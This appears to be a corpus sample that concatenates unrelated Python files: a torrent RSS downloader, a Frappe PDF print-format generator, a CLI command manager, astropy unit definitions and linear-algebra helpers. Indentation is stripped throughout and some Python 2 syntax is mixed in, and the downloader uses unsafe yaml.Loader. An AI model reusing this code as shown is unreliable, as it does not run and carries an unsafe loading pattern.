if response.status_code == 200:
return ensure_list(xmltodict.parse(response.text)['rss']['channel']['item'])
def download_show(search_string, download_location, episode_start=1):
session = TransmissionApi()
episodes = get_torrent_data_for_show(search_string)[episode_start - 1:]
for episode in episodes:
filepath = download_location / episode['title']
partpath = filepath.with_suffix('.part')
if filepath.exists() or partpath.exists():
continue
session.torrent_add(episode['link'], download_location)
time.sleep(1)
def download_all_shows(config):
root = pathlib.Path(config['root'])
for show in config['shows']:
search_string, folder, *start = show
start = 1 if start == [] else start[0]
folder = root / folder
download_show(search_string, folder, start)
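# Illustrative shows.yml (structure inferred from download_all_shows above;
# the optional third element is episode_start):
#
#   root: /data/anime
#   shows:
#     - ["Some Show 1080p", "some-show"]
#     - ["Other Show 1080p", "other-show", 5]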
if __name__ == '__main__':
with open('shows.yml', 'r', encoding='utf-8') as f:
config = yaml.load(f, Loader=yaml.Loader)
download_all_shows(config)
| nilq/baby-python | python |
from cedar_settings.default_settings import default_settings
default_settings['assets__default_search_results_per_page'] = ('int', 20)  # integer, results per page.
default_settings['assets__default_asset_source_string'] = ('text', "Miscellaneous")
default_settings['assets__default_files_div_id'] = ('text', "#tab-files")
| nilq/baby-python | python |
# Copyright (c) 2021, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See LICENSE
import click
import frappe
@frappe.whitelist()
def download_pdf(doctype, name, print_format, letterhead=None):
doc = frappe.get_doc(doctype, name)
generator = PrintFormatGenerator(print_format, doc, letterhead)
pdf = generator.render_pdf()
frappe.local.response.filename = "{name}.pdf".format(
name=name.replace(" ", "-").replace("/", "-")
)
frappe.local.response.filecontent = pdf
frappe.local.response.type = "pdf"
def get_html(doctype, name, print_format, letterhead=None):
doc = frappe.get_doc(doctype, name)
generator = PrintFormatGenerator(print_format, doc, letterhead)
return generator.get_html_preview()
class PrintFormatGenerator:
"""
Generate a PDF of a Document, with repeatable header and footer if letterhead is provided.
This generator draws its inspiration and, also a bit of its implementation, from this
discussion in the library github issues: https://github.com/Kozea/WeasyPrint/issues/92
"""
def __init__(self, print_format, doc, letterhead=None):
"""
Parameters
----------
print_format: str
Name of the Print Format
doc: str
Document to print
letterhead: str
Letter Head to apply (optional)
"""
self.base_url = frappe.utils.get_url()
self.print_format = frappe.get_doc("Print Format", print_format)
self.doc = doc
self.letterhead = frappe.get_doc("Letter Head", letterhead) if letterhead else None
self.build_context()
self.layout = self.get_layout(self.print_format)
self.context.layout = self.layout
def build_context(self):
self.print_settings = frappe.get_doc("Print Settings")
page_width_map = {"A4": 210, "Letter": 216}
page_width = page_width_map.get(self.print_settings.pdf_page_size) or 210
body_width = (
page_width - self.print_format.margin_left - self.print_format.margin_right
)
print_style = (
frappe.get_doc("Print Style", self.print_settings.print_style)
if self.print_settings.print_style
else None
)
context = frappe._dict(
{
"doc": self.doc,
"print_format": self.print_format,
"print_settings": self.print_settings,
"print_style": print_style,
"letterhead": self.letterhead,
"page_width": page_width,
"body_width": body_width,
}
)
self.context = context
def get_html_preview(self):
header_html, footer_html = self.get_header_footer_html()
self.context.header = header_html
self.context.footer = footer_html
return self.get_main_html()
def get_main_html(self):
self.context.css = frappe.render_template(
"templates/print_format/print_format.css", self.context
)
return frappe.render_template(
"templates/print_format/print_format.html", self.context
)
def get_header_footer_html(self):
header_html = footer_html = None
if self.letterhead:
header_html = frappe.render_template(
"templates/print_format/print_header.html", self.context
)
if self.letterhead:
footer_html = frappe.render_template(
"templates/print_format/print_footer.html", self.context
)
return header_html, footer_html
def render_pdf(self):
"""
Returns
-------
pdf: a bytes sequence
The rendered PDF.
"""
HTML, CSS = import_weasyprint()
self._make_header_footer()
self.context.update(
{"header_height": self.header_height, "footer_height": self.footer_height}
)
main_html = self.get_main_html()
html = HTML(string=main_html, base_url=self.base_url)
main_doc = html.render()
if self.header_html or self.footer_html:
self._apply_overlay_on_main(main_doc, self.header_body, self.footer_body)
pdf = main_doc.write_pdf()
return pdf
def _compute_overlay_element(self, element: str):
"""
Parameters
----------
element: str
Either 'header' or 'footer'
Returns
-------
element_body: BlockBox
A Weasyprint pre-rendered representation of an html element
element_height: float
The height of this element, which will be then translated in a html height
"""
HTML, CSS = import_weasyprint()
html = HTML(string=getattr(self, f"{element}_html"), base_url=self.base_url,)
element_doc = html.render(
stylesheets=[CSS(string="@page {size: A4 portrait; margin: 0;}")]
)
element_page = element_doc.pages[0]
element_body = PrintFormatGenerator.get_element(
element_page._page_box.all_children(), "body"
)
element_body = element_body.copy_with_children(element_body.all_children())
element_html = PrintFormatGenerator.get_element(
element_page._page_box.all_children(), element
)
if element == "header":
element_height = element_html.height
if element == "footer":
element_height = element_page.height - element_html.position_y
return element_body, element_height
def _apply_overlay_on_main(self, main_doc, header_body=None, footer_body=None):
"""
Insert the header and the footer in the main document.
Parameters
----------
main_doc: Document
The top level representation for a PDF page in Weasyprint.
header_body: BlockBox
A representation for an html element in Weasyprint.
footer_body: BlockBox
A representation for an html element in Weasyprint.
"""
for page in main_doc.pages:
page_body = PrintFormatGenerator.get_element(page._page_box.all_children(), "body")
if header_body:
page_body.children += header_body.all_children()
if footer_body:
page_body.children += footer_body.all_children()
def _make_header_footer(self):
self.header_html, self.footer_html = self.get_header_footer_html()
if self.header_html:
header_body, header_height = self._compute_overlay_element("header")
else:
header_body, header_height = None, 0
if self.footer_html:
footer_body, footer_height = self._compute_overlay_element("footer")
else:
footer_body, footer_height = None, 0
self.header_body = header_body
self.header_height = header_height
self.footer_body = footer_body
self.footer_height = footer_height
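    # Flow recap (names from this class): render_pdf() calls
    # _make_header_footer() to pre-render and measure the overlays, passes
    # header_height/footer_height into the template context so the main body
    # reserves that space, then _apply_overlay_on_main() grafts the
    # pre-rendered boxes onto every page body.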
def get_layout(self, print_format):
layout = frappe.parse_json(print_format.format_data)
layout = self.set_field_renderers(layout)
layout = self.process_margin_texts(layout)
return layout
def set_field_renderers(self, layout):
renderers = {"HTML Editor": "HTML", "Markdown Editor": "Markdown"}
for section in layout["sections"]:
for column in section["columns"]:
for df in column["fields"]:
fieldtype = df["fieldtype"]
renderer_name = fieldtype.replace(" ", "")
df["renderer"] = renderers.get(fieldtype) or renderer_name
df["section"] = section
return layout
def process_margin_texts(self, layout):
margin_texts = [
"top_left",
"top_center",
"top_right",
"bottom_left",
"bottom_center",
"bottom_right",
]
for key in margin_texts:
text = layout.get("text_" + key)
if text and "{{" in text:
layout["text_" + key] = frappe.render_template(text, self.context)
return layout
@staticmethod
def get_element(boxes, element):
"""
Given a set of boxes representing the elements of a PDF page in a DOM-like way, find the
box which is named `element`.
Look at the notes of the class for more details on Weasyprint insides.
"""
for box in boxes:
if box.element_tag == element:
return box
return PrintFormatGenerator.get_element(box.all_children(), element)
def import_weasyprint():
try:
from weasyprint import HTML, CSS
return HTML, CSS
except OSError:
message = "\n".join([
"WeasyPrint depdends on additional system dependencies.",
"Follow instructions specific to your operating system:",
"https://doc.courtbouillon.org/weasyprint/stable/first_steps.html"
])
click.secho(
message,
fg="yellow"
)
frappe.throw(message)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
import sys
import argparse
import abc
import re
from six import add_metaclass, text_type
from mCli.utils import get_resource_classes, Singleton
from mCli.commands.base import Command
@add_metaclass(abc.ABCMeta)
class CommandManager(Singleton, object):
"""Base class for commands
"""
description = ""
def __init__(self, path=None, prefix=None):
# Load the Commands Subclasses
self.cmdcls = get_resource_classes(path, prefix)
self.commands = [c.__name__ for c in self.cmdcls]
self.commands.append("help")
# Building Help Commands
self.helpstr = "Available Commands \n"
self.helpstr += "****************************************************\n"
for cls in self.cmdcls:
self.helpstr += cls.__name__ + " -------" + cls.description + "\n"
self.helpstr += "****************************************************\n"
def helpfn(self, arg=None):
arg = [str(a) for a in arg if a]
        print(arg)
        if len(arg) >= 1 and arg[0] in self.commands:
result = "****************************************************\n"
for cls in self.cmdcls:
if self.isequal(str(arg[0]), str(cls.__name__)):
                result += cls.details + "\n"
result += "****************************************************\n"
return result
return self.helpstr
def list(self, filter="*"):
# return the commands name
res = []
if filter == "*":
return self.commands
else:
for cmd in self.commands:
match = re.match(r'(%s)' % filter, cmd, re.M | re.I)
if match:
res.append(cmd)
return res
def isequal(self, a, b):
return a.upper() == b.upper()
def execute(self, cmdname):
# cmd may have mutliple parts . first part is cmd, remaining parts are args
cmd = cmdname.split()
x = len(cmd)
# No Command entered, user pressed enter
if x == 0:
return None
# populating args for commands
args = []
if x != 0:
args += cmd[1:]
if cmd[0] in ["help", "Help", "HELP"]:
return self.helpfn(args)
# get the command object and execute call function
for c in self.cmdcls:
if self.isequal(str(cmd[0]), str(c.__name__)):
return c()(args)
return "Error : Command Not Found"
if __name__ == "__main__":
cm = CommandManager()
print cm.list("*")
print cm.list("H")
print cm.list("He")
print cm.list("Pi")
#print cm.execute("Help")
#print get_resource_classes()
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This package defines the astrophysics-specific units. They are also
available in the `astropy.units` namespace.
"""
from . import si
from astropy.constants import si as _si
from .core import (UnitBase, def_unit, si_prefixes, binary_prefixes,
set_enabled_units)
# To ensure si units of the constants can be interpreted.
set_enabled_units([si])
import numpy as _numpy
_ns = globals()
###########################################################################
# LENGTH
def_unit((['AU', 'au'], ['astronomical_unit']), _si.au, namespace=_ns, prefixes=True,
doc="astronomical unit: approximately the mean Earth--Sun "
"distance.")
def_unit(['pc', 'parsec'], _si.pc, namespace=_ns, prefixes=True,
doc="parsec: approximately 3.26 light-years.")
def_unit(['solRad', 'R_sun', 'Rsun'], _si.R_sun, namespace=_ns,
doc="Solar radius", prefixes=False,
format={'latex': r'R_{\odot}', 'unicode': 'R⊙'})
def_unit(['jupiterRad', 'R_jup', 'Rjup', 'R_jupiter', 'Rjupiter'],
_si.R_jup, namespace=_ns, prefixes=False, doc="Jupiter radius",
# LaTeX jupiter symbol requires wasysym
format={'latex': r'R_{\rm J}', 'unicode': 'R♃'})
def_unit(['earthRad', 'R_earth', 'Rearth'], _si.R_earth, namespace=_ns,
prefixes=False, doc="Earth radius",
# LaTeX earth symbol requires wasysym
format={'latex': r'R_{\oplus}', 'unicode': 'R⊕'})
def_unit(['lyr', 'lightyear'], (_si.c * si.yr).to(si.m),
namespace=_ns, prefixes=True, doc="Light year")
###########################################################################
# AREAS
def_unit(['barn', 'barn'], 10 ** -28 * si.m ** 2, namespace=_ns, prefixes=True,
doc="barn: unit of area used in HEP")
###########################################################################
# ANGULAR MEASUREMENTS
def_unit(['cycle', 'cy'], 2.0 * _numpy.pi * si.rad,
namespace=_ns, prefixes=False,
doc="cycle: angular measurement, a full turn or rotation")
def_unit(['spat', 'sp'], 4.0 * _numpy.pi * si.sr,
namespace=_ns, prefixes=False,
doc="spat: the solid angle of the sphere, 4pi sr")
###########################################################################
# MASS
def_unit(['solMass', 'M_sun', 'Msun'], _si.M_sun, namespace=_ns,
prefixes=False, doc="Solar mass",
format={'latex': r'M_{\odot}', 'unicode': 'M⊙'})
def_unit(['jupiterMass', 'M_jup', 'Mjup', 'M_jupiter', 'Mjupiter'],
_si.M_jup, namespace=_ns, prefixes=False, doc="Jupiter mass",
# LaTeX jupiter symbol requires wasysym
format={'latex': r'M_{\rm J}', 'unicode': 'M♃'})
def_unit(['earthMass', 'M_earth', 'Mearth'], _si.M_earth, namespace=_ns,
prefixes=False, doc="Earth mass",
# LaTeX earth symbol requires wasysym
format={'latex': r'M_{\oplus}', 'unicode': 'M⊕'})
def_unit(['M_p'], _si.m_p, namespace=_ns, doc="Proton mass",
format={'latex': r'M_{p}', 'unicode': 'Mₚ'})
def_unit(['M_e'], _si.m_e, namespace=_ns, doc="Electron mass",
format={'latex': r'M_{e}', 'unicode': 'Mₑ'})
# Unified atomic mass unit
def_unit(['u', 'Da', 'Dalton'], _si.u, namespace=_ns,
prefixes=True, exclude_prefixes=['a', 'da'],
doc="Unified atomic mass unit")
##########################################################################
# ENERGY
# Here, explicitly convert the planck constant to 'eV s' since the constant
# can override that to give a more precise value that takes into account
# covariances between e and h. Eventually, this may also be replaced with
# just `_si.Ryd.to(eV)`.
def_unit(['Ry', 'rydberg'],
(_si.Ryd * _si.c * _si.h.to(si.eV * si.s)).to(si.eV),
namespace=_ns, prefixes=True,
doc="Rydberg: Energy of a photon whose wavenumber is the Rydberg "
"constant",
format={'latex': r'R_{\infty}', 'unicode': 'R∞'})
##########################################################################
# PRESSURE
def_unit(['bar'], 1e5 * si.Pa, namespace=_ns,
prefixes=[(['m'], ['milli'], 1.e-3)],
doc="bar: pressure")
###########################################################################
# ILLUMINATION
def_unit(['solLum', 'L_sun', 'Lsun'], _si.L_sun, namespace=_ns,
prefixes=False, doc="Solar luminance",
format={'latex': r'L_{\odot}', 'unicode': 'L⊙'})
###########################################################################
# SPECTRAL DENSITY
def_unit((['ph', 'photon'], ['photon']),
format={'ogip': 'photon', 'vounit': 'photon'},
namespace=_ns, prefixes=True)
def_unit(['Jy', 'Jansky', 'jansky'], 1e-26 * si.W / si.m ** 2 / si.Hz,
namespace=_ns, prefixes=True,
doc="Jansky: spectral flux density")
def_unit(['R', 'Rayleigh', 'rayleigh'],
(1e10 / (4 * _numpy.pi)) *
ph * si.m ** -2 * si.s ** -1 * si.sr ** -1,
namespace=_ns, prefixes=True,
doc="Rayleigh: photon flux")
###########################################################################
# MISCELLANEOUS
# Some of these are very FITS-specific and perhaps considered a mistake.
# Maybe they should be moved into the FITS format class?
# TODO: This is defined by the FITS standard as "relative to the sun".
# Is that mass, volume, what?
def_unit(['Sun'], namespace=_ns)
###########################################################################
# EVENTS
def_unit((['ct', 'count'], ['count']),
format={'fits': 'count', 'ogip': 'count', 'vounit': 'count'},
namespace=_ns, prefixes=True, exclude_prefixes=['p'])
def_unit((['pix', 'pixel'], ['pixel']),
format={'ogip': 'pixel', 'vounit': 'pixel'},
namespace=_ns, prefixes=True)
###########################################################################
# MISCELLANEOUS
def_unit(['chan'], namespace=_ns, prefixes=True)
def_unit(['bin'], namespace=_ns, prefixes=True)
def_unit((['vox', 'voxel'], ['voxel']),
format={'fits': 'voxel', 'ogip': 'voxel', 'vounit': 'voxel'},
namespace=_ns, prefixes=True)
def_unit((['bit', 'b'], ['bit']), namespace=_ns,
prefixes=si_prefixes + binary_prefixes)
def_unit((['byte', 'B'], ['byte']), 8 * bit, namespace=_ns,
format={'vounit': 'byte'},
prefixes=si_prefixes + binary_prefixes,
exclude_prefixes=['d'])
def_unit(['adu'], namespace=_ns, prefixes=True)
def_unit(['beam'], namespace=_ns, prefixes=True)
def_unit(['electron'], doc="Number of electrons", namespace=_ns,
format={'latex': r'e^{-}', 'unicode': 'e⁻'})
# This is not formally a unit, but is used in that way in many contexts, and
# an appropriate equivalency is only possible if it's treated as a unit (see
# https://arxiv.org/pdf/1308.4150.pdf for more)
# Also note that h or h100 or h_100 would be a better name, but they either
# conflict or have numbers in them, which is apparently disallowed
def_unit(['littleh'], namespace=_ns, prefixes=False,
doc="Reduced/\"dimensionless\" Hubble constant",
format={'latex': r'h_{100}'})
# The torr is almost the same as mmHg but not quite.
# See https://en.wikipedia.org/wiki/Torr
# Define the unit here despite it not being an astrophysical unit.
# It may be moved if more similar units are created later.
def_unit(['Torr', 'torr'], _si.atm.value/760. * si.Pa, namespace=_ns,
prefixes=[(['m'], ['milli'], 1.e-3)],
doc="Unit of pressure based on an absolute scale, now defined as "
"exactly 1/760 of a standard atmosphere")
###########################################################################
# CLEANUP
del UnitBase
del def_unit
del si
###########################################################################
# DOCSTRING
# This generates a docstring for this module that describes all of the
# standard units defined here.
from .utils import generate_unit_summary as _generate_unit_summary
if __doc__ is not None:
__doc__ += _generate_unit_summary(globals())
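# Illustrative conversions using the units defined above (a sketch, kept as
# comments so importing stays side-effect free; assumes this module is exposed
# as ``astropy.units``):
#   >>> from astropy import units as u
#   >>> (1 * u.bar).to(u.Torr)               # ~750.06 Torr, since 1 Torr = atm / 760
#   >>> (1 * u.Jy).to(u.W / u.m**2 / u.Hz)   # 1e-26 W / (m2 Hz), by definition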
| nilq/baby-python | python |
"""
#########################
Linalg (``utils.linalg``)
#########################
Linear algebra helper routines and wrapper functions for handling sparse
matrices and dense matrices representation.
"""
import sys
import copy
import numpy as np
import scipy
import scipy.sparse as sp
import scipy.sparse.linalg as sla
import numpy.linalg as nla
from operator import mul, eq, ne, add, ge, le, itemgetter
from operator import truediv as div
from math import sqrt, log, isnan, ceil
from scipy.cluster.hierarchy import linkage, cophenet
from scipy.special import erfc, erfcinv
import warnings
#
# Wrapper functions for handling sparse matrices and dense matrices representation.
### scipy.sparse, numpy.matrix
#
def diff(X):
"""
Compute differences between adjacent elements of X.
:param X: Vector for which consecutive differences are computed.
:type X: :class:`numpy.matrix`
"""
assert 1 in X.shape, "sX should be a vector."
assert not sp.isspmatrix(X), "X is sparse matrix."
X = X.flatten()
return [X[0, j + 1] - X[0, j] for j in range(X.shape[1] - 1)]
def sub2ind(shape, row_sub, col_sub):
"""
Return the linear index equivalents to the row and column subscripts for
given matrix shape.
:param shape: Preferred matrix shape for subscripts conversion.
:type shape: `tuple`
:param row_sub: Row subscripts.
:type row_sub: `list`
:param col_sub: Column subscripts.
:type col_sub: `list`
"""
assert len(row_sub) == len(
col_sub), "Row and column subscripts do not match."
res = [j * shape[0] + i for i, j in zip(row_sub, col_sub)]
return res
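# Example (illustrative): for shape (3, 2) the column-major, Matlab-style
# linear indices of subscripts (0, 0) and (2, 1) are 0 and 5:
#   sub2ind((3, 2), [0, 2], [0, 1])  ->  [0, 5]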
def trace(X):
"""
Return trace of sparse or dense square matrix X.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
assert X.shape[0] == X.shape[1], "X should be square matrix."
if sp.isspmatrix(X):
return sum(X[i, i] for i in range(X.shape[0]))
else:
return np.trace(np.mat(X))
def any(X, axis=None):
"""
Test whether any element along a given axis of sparse or dense matrix X is nonzero.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Specified axis along which nonzero test is performed.
If :param:`axis` not specified, whole matrix is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
if axis is None:
            # true as soon as at least one entry is stored (stored == nonzero)
            return len(X.data) > 0
res = [0 for _ in range(X.shape[1 - axis])]
def _caxis(now, row, col):
res[col] += 1
def _raxis(now, row, col):
res[row] += 1
check = _caxis if axis == 0 else _raxis
now = 0
for row in range(X.shape[0]):
upto = X.indptr[row + 1]
while now < upto:
col = X.indices[now]
check(now, row, col)
now += 1
sol = [x != 0 for x in res]
return np.mat(sol) if axis == 0 else np.mat(sol).T
else:
return X.any(axis)
def all(X, axis=None):
"""
Test whether all elements along a given axis of sparse or dense matrix
:param:`X` are nonzero.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param axis: Specified axis along which nonzero test is performed.
If :param:`axis` not specified, whole matrix is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
if axis is None:
return len(X.data) == X.shape[0] * X.shape[1]
res = [0 for _ in range(X.shape[1 - axis])]
def _caxis(now, row, col):
res[col] += 1
def _raxis(now, row, col):
res[row] += 1
check = _caxis if axis == 0 else _raxis
now = 0
for row in range(X.shape[0]):
upto = X.indptr[row + 1]
while now < upto:
col = X.indices[now]
check(now, row, col)
now += 1
sol = [x == X.shape[0] if axis == 0 else x == X.shape[1] for x in res]
return np.mat(sol) if axis == 0 else np.mat(sol).T
else:
return X.all(axis)
def find(X):
"""
Return all nonzero elements indices (linear indices) of sparse or dense
matrix :param:`X`. It is Matlab notation.
:param X: Target matrix.
type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
X = X.tocsr()
res = []
now = 0
for row in range(X.shape[0]):
upto = X.indptr[row + 1]
while now < upto:
col = X.indices[now]
if X.data[now]:
res.append(col * X.shape[0] + row)
now += 1
return res
else:
return [j * X.shape[0] + i for i in range(X.shape[0]) for j in range(X.shape[1]) if X[i, j]]
def negative(X):
"""
Check if :param:`X` contains negative elements.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
if any(X.data < 0):
return True
else:
        if any(np.asmatrix(X) < 0):
            return True
    return False
def sort(X):
"""
Return sorted elements of :param:`X` and array of corresponding
sorted indices.
:param X: Target vector.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
assert 1 in X.shape, "X should be vector."
X = X.flatten().tolist()[0]
return sorted(X), sorted(list(range(len(X))), key=X.__getitem__)
def std(X, axis=None, ddof=0):
"""
Compute the standard deviation along the specified :param:`axis` of
matrix :param:`X`.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Axis along which deviation is computed. If not specified,
whole matrix :param:`X` is considered.
:type axis: `int`
:param ddof: Means delta degrees of freedom. The divisor used in
computation is N - :param:`ddof`, where N represents the
number of elements. Default is 0.
:type ddof: `float`
"""
assert len(X.shape) == 2, "Input matrix X should be 2-D."
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
if sp.isspmatrix(X):
if axis is None:
mean = X.mean()
no = X.shape[0] * X.shape[1]
            return sqrt(1. / (no - ddof) * (sum((x - mean) ** 2 for x in X.data) + (no - len(X.data)) * mean ** 2))
if axis == 0:
return np.mat([np.std(X[:, i].toarray(), axis, ddof) for i in range(X.shape[1])])
if axis == 1:
return np.mat([np.std(X[i, :].toarray(), axis, ddof) for i in range(X.shape[0])]).T
else:
return np.std(X, axis=axis, ddof=ddof)
def argmax(X, axis=None):
"""
Return tuple (values, indices) of the maximum entries of matrix
:param:`X` along axis :param:`axis`. Row major order.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Specify axis along which to operate. If not specified,
whole matrix :param:`X` is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
res = [[float('-inf'), 0]
for _ in range(X.shape[1 - axis])] if axis is not None else [float('-inf'), 0]
def _caxis(row, col):
if X[row, col] > res[col][0]:
res[col] = (X[row, col], row)
def _raxis(row, col):
if X[row, col] > res[row][0]:
res[row] = (X[row, col], col)
def _naxis(row, col):
if X[row, col] > res[0]:
res[0] = X[row, col]
                res[1] = row * X.shape[1] + col  # row-major, matching the dense branch
check = _caxis if axis == 0 else _raxis if axis == 1 else _naxis
[check(row, col) for row in range(X.shape[0])
for col in range(X.shape[1])]
if axis is None:
return res
elif axis == 0:
t = list(zip(*res))
return list(t[0]), np.mat(t[1])
else:
t = list(zip(*res))
return list(t[0]), np.mat(t[1]).T
else:
idxX = np.asmatrix(X).argmax(axis)
if axis is None:
eX = X[idxX // X.shape[1], idxX % X.shape[1]]
elif axis == 0:
eX = [X[idxX[0, idx], col]
for idx, col in zip(range(X.shape[1]), range(X.shape[1]))]
else:
eX = [X[row, idxX[idx, 0]]
for row, idx in zip(range(X.shape[0]), range(X.shape[0]))]
return eX, idxX
def argmin(X, axis=None):
"""
Return tuple (values, indices) of the minimum entries of matrix :param:`X`
along axis :param:`axis`. Row major order.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Specify axis along which to operate. If not specified,
whole matrix :param:`X` is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
res = [[float('inf'), 0]
for _ in range(X.shape[1 - axis])] if axis is not None else [float('inf'), 0]
def _caxis(row, col):
if X[row, col] < res[col][0]:
res[col] = (X[row, col], row)
def _raxis(row, col):
if X[row, col] < res[row][0]:
res[row] = (X[row, col], col)
def _naxis(row, col):
if X[row, col] < res[0]:
res[0] = X[row, col]
                res[1] = row * X.shape[1] + col  # row-major, matching the dense branch
check = _caxis if axis == 0 else _raxis if axis == 1 else _naxis
[check(row, col) for row in range(X.shape[0])
for col in range(X.shape[1])]
if axis is None:
return res
elif axis == 0:
t = list(zip(*res))
return list(t[0]), np.mat(t[1])
else:
t = list(zip(*res))
return list(t[0]), np.mat(t[1]).T
else:
idxX = np.asmatrix(X).argmin(axis)
if axis is None:
eX = X[idxX // X.shape[1], idxX % X.shape[1]]
elif axis == 0:
eX = [X[idxX[0, idx], col]
for idx, col in zip(range(X.shape[1]), range(X.shape[1]))]
else:
eX = [X[row, idxX[idx, 0]]
for row, idx in zip(range(X.shape[0]), range(X.shape[0]))]
return eX, idxX
def repmat(X, m, n):
"""
Construct matrix consisting of an m-by-n tiling of copies of X.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param m,n: The number of repetitions of :param:`X` along each axis.
:type m,n: `int`
"""
if sp.isspmatrix(X):
return sp.hstack([sp.vstack([X for _ in range(m)], format=X.format) for _ in range(n)], format=X.format)
else:
return np.tile(np.asmatrix(X), (m, n))
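# Example (illustrative): tiling a 1x2 matrix 2-by-3 gives a 2x6 result;
# sparse input stays sparse, dense input stays dense:
#   repmat(np.mat([[1, 2]]), 2, 3).shape  ->  (2, 6)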
def inv_svd(X):
"""
Compute matrix inversion using SVD.
:param X: The input matrix.
:type X: :class:`scipy.sparse` or :class:`numpy.matrix`
"""
U, S, V = svd(X)
if sp.isspmatrix(S):
S_inv = _sop_spmatrix(S, op=lambda x: 1. / x)
else:
S_inv = np.diag(1. / np.diagonal(S))
X_inv = dot(dot(V.T, S_inv), U.T)
return X_inv
def svd(X):
"""
Compute standard SVD on matrix X.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
if X.shape[0] <= X.shape[1]:
U, S, V = _svd_left(X)
else:
U, S, V = _svd_right(X)
else:
U, S, V = nla.svd(np.mat(X), full_matrices=False)
S = np.mat(np.diag(S))
return U, S, V
def _svd_right(X):
"""
Compute standard SVD on matrix X. Scipy.sparse.linalg.svd ARPACK does
not allow computation of rank(X) SVD.
:param X: The input sparse matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
"""
XXt = dot(X, X.T)
if X.shape[0] > 1:
if '0.8' in scipy.version.version:
val, u_vec = sla.eigen_symmetric(XXt, k=X.shape[0] - 1)
else:
# In scipy 0.9.0 ARPACK interface has changed. eigen_symmetric
# routine was renamed to eigsh
# http://docs.scipy.org/doc/scipy/reference/release.0.9.0.html#scipy-sparse
try:
val, u_vec = sla.eigsh(XXt, k=X.shape[0] - 1)
except sla.ArpackNoConvergence as err:
# If eigenvalue iteration fails to converge, partially
# converged results can be accessed
val = err.eigenvalues
u_vec = err.eigenvectors
else:
val, u_vec = nla.eigh(XXt.todense())
# remove insignificant eigenvalues
keep = np.where(val > 1e-7)[0]
u_vec = u_vec[:, keep]
val = val[keep]
# sort eigen vectors (descending)
idx = np.argsort(val)[::-1]
val = val[idx]
# construct U
U = sp.csr_matrix(u_vec[:, idx])
# compute S
tmp_val = np.sqrt(val)
tmp_l = len(idx)
S = sp.spdiags(tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
# compute V from inverse of S
inv_S = sp.spdiags(1. / tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
V = U.T * X
V = inv_S * V
return U, S, V
def _svd_left(X):
"""
Compute standard SVD on matrix X. Scipy.sparse.linalg.svd ARPACK does
not allow computation of rank(X) SVD.
:param X: The input sparse matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
"""
XtX = dot(X.T, X)
if X.shape[1] > 1:
if '0.9' in scipy.version.version or '0.10' in scipy.version.version or '0.11' in scipy.version.version:
# In scipy 0.9.0 ARPACK interface has changed. eigen_symmetric
# routine was renamed to eigsh
# http://docs.scipy.org/doc/scipy/reference/release.0.9.0.html#scipy-sparse
try:
val, v_vec = sla.eigsh(XtX, k=X.shape[1] - 1)
except sla.ArpackNoConvergence as err:
# If eigenvalue iteration fails to converge, partially
# converged results can be accessed
val = err.eigenvalues
v_vec = err.eigenvectors
else:
val, v_vec = sla.eigen_symmetric(XtX, k=X.shape[1] - 1)
else:
val, v_vec = nla.eigh(XtX.todense())
# remove insignificant eigenvalues
keep = np.where(val > 1e-7)[0]
v_vec = v_vec[:, keep]
val = val[keep]
# sort eigen vectors (descending)
idx = np.argsort(val)[::-1]
val = val[idx]
# construct V
V = sp.csr_matrix(v_vec[:, idx])
# compute S
tmp_val = np.sqrt(val)
tmp_l = len(idx)
S = sp.spdiags(tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
# compute U from inverse of S
inv_S = sp.spdiags(1. / tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
U = X * V * inv_S
V = V.T
return U, S, V
def dot(X, Y):
"""
Compute dot product of matrices :param:`X` and :param:`Y`.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
